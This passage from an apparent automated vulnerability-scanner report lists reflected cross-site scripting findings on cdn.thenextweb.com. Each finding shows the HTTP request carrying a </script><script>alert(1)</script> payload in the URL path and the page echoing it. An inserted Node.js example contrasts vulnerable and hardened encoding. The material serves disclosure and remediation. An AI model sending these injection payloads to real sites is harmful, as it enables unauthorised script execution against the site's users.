Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:56:25 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
avascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6b58d0</script><script>alert(1)</script>6d865618bfe/static/fonts/proximanova-regular-webfont.woff'
    };
</script>
...[SNIP]...

3.68. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d8ce</script><script>alert(1)</script>50879ddfa23 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/static4d8ce</script><script>alert(1)</script>50879ddfa23/fonts/proximanova-regular-webfont.woff HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:43:23 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=35dd28418mn8nlor7lqe19i042; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:43:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:56:49 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
pt">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static4d8ce</script><script>alert(1)</script>50879ddfa23/fonts/proximanova-regular-webfont.woff'
    };
</script>
...[SNIP]...

3.69. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b1a7</script><script>alert(1)</script>b86cea24919 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/static/fonts7b1a7</script><script>alert(1)</script>b86cea24919/proximanova-regular-webfont.woff HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 127.0.0.1
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:57:13 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=89ifn7oegpuv8vvsvtduq7eit1; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:57:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:57:14 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/fonts7b1a7</script><script>alert(1)</script>b86cea24919/proximanova-regular-webfont.woff'
    };
</script>
...[SNIP]...

3.70. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 549bd</script><script>alert(1)</script>5f79a462611 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff549bd</script><script>alert(1)</script>5f79a462611 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 127.0.0.1
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:57:38 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=1sscjgh6sv2ut9f79fbahhrpq5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:57:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:57:40 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
ite_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff549bd</script><script>alert(1)</script>5f79a462611'
    };
</script>
...[SNIP]...

3.71. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13602</script><script>alert(1)</script>bb3f400fab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content13602</script><script>alert(1)</script>bb3f400fab5/themes/tnw_6/static/images/spreadus_button.png?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:00 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=f3t4um03up2ublq6e26fqdfd06; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26121
Date: Wed, 05 Oct 2011 20:55:30 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
type="text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content13602</script><script>alert(1)</script>bb3f400fab5/themes/tnw_6/static/images/spreadus_button.png?version=1'
    };
</script>
...[SNIP]...

3.72. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9ab6</script><script>alert(1)</script>3a004a720e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themesb9ab6</script><script>alert(1)</script>3a004a720e/tnw_6/static/images/spreadus_button.png?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:09 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=jp7bqaq7um9e8cb8predar8am5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26120
Date: Wed, 05 Oct 2011 20:55:38 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themesb9ab6</script><script>alert(1)</script>3a004a720e/tnw_6/static/images/spreadus_button.png?version=1'
    };
</script>
...[SNIP]...

3.73. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34f5b</script><script>alert(1)</script>1c9d2aad0c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_634f5b</script><script>alert(1)</script>1c9d2aad0c5/static/images/spreadus_button.png?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:17 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=sfv4qhbck9tmkc3u4a85643qi2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26121
Date: Wed, 05 Oct 2011 20:55:47 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
avascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_634f5b</script><script>alert(1)</script>1c9d2aad0c5/static/images/spreadus_button.png?version=1'
    };
</script>
...[SNIP]...

3.74. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4f70</script><script>alert(1)</script>a826a25cbfe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6/staticd4f70</script><script>alert(1)</script>a826a25cbfe/images/spreadus_button.png?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:25 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=ueglsb74c9u9jgaffut3aep3q4; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26121
Date: Wed, 05 Oct 2011 20:55:54 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
pt">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/staticd4f70</script><script>alert(1)</script>a826a25cbfe/images/spreadus_button.png?version=1'
    };
</script>
...[SNIP]...
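Added example (not code from the report or from the thenextweb.com theme, whose PHP source is not shown here): a Node.js reconstruction of the $_CONFIG block above, emitted once by plain string concatenation, as the response shows, and once through a JSON-plus-HTML-aware encoder, with a small model of the HTML tokeniser's rule that a script element ends at the first </script whatever the JavaScript around it looks like. The names renderConfigVulnerable, renderConfigHardened, jsLiteral, scriptElementsIn and payloadBreaksOut are the example's own; the test path is the one submitted in finding 3.74.

```javascript
// Added example: why a request path reflected into a single-quoted JS string is
// exploitable with </script>, and how to encode it so it is not.
// Not code from the report or from the thenextweb.com theme.

// Payload exactly as submitted in finding 3.74 (REST URL parameter 4).
const PAYLOAD = 'd4f70</script><script>alert(1)</script>a826a25cbfe';
const PATH = '/wp-content/themes/tnw_6/static' + PAYLOAD + '/images/spreadus_button.png?version=1';

// Hypothetical reconstruction of the theme's template: the request path is
// concatenated straight into a single-quoted JS string, which is the behaviour
// the report's response shows. The real PHP is not on the page.
function renderConfigVulnerable(currentUrl) {
  return (
    '<script type="text/javascript">\n' +
    '    var $_CONFIG = {\n' +
    "    'site_url': 'http://thenextweb.com',\n" +
    "    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',\n" +
    "    'current_url': '" + currentUrl + "'\n" +
    '    };\n' +
    '</script>'
  );
}

// Safe JS string literal for use inside a <script> element: JSON handles quotes,
// backslashes and control characters; < > & are then turned into \u escapes so
// the HTML tokeniser can never see </script inside the value. U+2028/U+2029 are
// escaped as well because older engines treat them as line terminators.
// (& is not decoded inside script data; it is escaped in case the same literal
// is ever reused in an attribute or in XHTML.)
function jsLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Same block, value emitted through jsLiteral (hypothetical fixed template).
function renderConfigHardened(currentUrl) {
  return (
    '<script type="text/javascript">\n' +
    '    var $_CONFIG = {\n' +
    "    'site_url': 'http://thenextweb.com',\n" +
    "    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',\n" +
    "    'current_url': " + jsLiteral(currentUrl) + '\n' +
    '    };\n' +
    '</script>'
  );
}

// Model of the HTML tokeniser: a script element's content runs from the end of
// its start tag to the first "</script" (case-insensitive), JS syntax ignored.
function scriptElementsIn(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script/gi;
  const bodies = [];
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// True when the rendered page yields more than one script element, i.e. the
// reflected value closed the config block and opened its own.
function payloadBreaksOut(html) {
  return scriptElementsIn(html).length > 1;
}

// Evaluate the hardened block to show the escaped literal still round-trips to
// the original path. new Function is used here only to demonstrate that; it is
// not something to do with untrusted input in production code.
function currentUrlFromHardened(path) {
  const body = scriptElementsIn(renderConfigHardened(path))[0];
  return new Function(body + '; return $_CONFIG.current_url;')();
}

console.log('vulnerable breaks out:', payloadBreaksOut(renderConfigVulnerable(PATH)));
console.log('hardened breaks out:  ', payloadBreaksOut(renderConfigHardened(PATH)));
```

The point the model makes is that the fix is not a JavaScript-level one: backslash-escaping the single quote (addslashes, esc_js-style quoting) leaves the `<` and `/` intact and the tokeniser still ends the element at the reflected </script>. The PHP counterpart of jsLiteral for a WordPress theme is json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP), which emits the same \u003c and \u003e escapes.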

3.75. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1041</script><script>alert(1)</script>c2ae652104c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content/themes/tnw_6/static/imagese1041</script><script>alert(1)</script>c2ae652104c/spreadus_button.png?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:32 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=jijgge41vtiuiu247b37nan9r4; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26121
Date: Wed, 05 Oct 2011 20:56:01 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/imagese1041</script><script>alert(1)</script>c2ae652104c/spreadus_button.png?version=1'
    };
</script>
...[SNIP]...

3.76. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/spreadus_button.png

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21bcc</script><script>alert(1)</script>54d465d8e71 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content/themes/tnw_6/static/images/spreadus_button.png21bcc</script><script>alert(1)</script>54d465d8e71?version=1 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:47 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=avjk21h7g81874vr8ujsctdhr4; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26121
